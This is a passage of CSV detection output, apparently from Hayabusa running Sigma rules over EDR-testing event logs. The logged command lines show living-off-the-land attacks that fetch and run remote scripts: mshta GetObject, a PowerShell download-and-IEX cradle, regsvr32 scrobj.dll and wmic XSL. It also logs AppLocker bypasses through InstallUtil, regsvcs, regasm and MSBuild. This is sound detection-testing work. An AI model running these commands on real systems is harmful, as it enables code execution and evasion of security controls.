Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C 
""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe 
javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\mshta.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT 
AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: 
C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 
+09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C 
""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.646 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:30.074 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.295 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.411 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:34.483 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.312 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.358 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:39.907 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.287 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:44.641 +09:00,MSEDGEWIN10,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct 
scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe 
xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 
+09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.286 
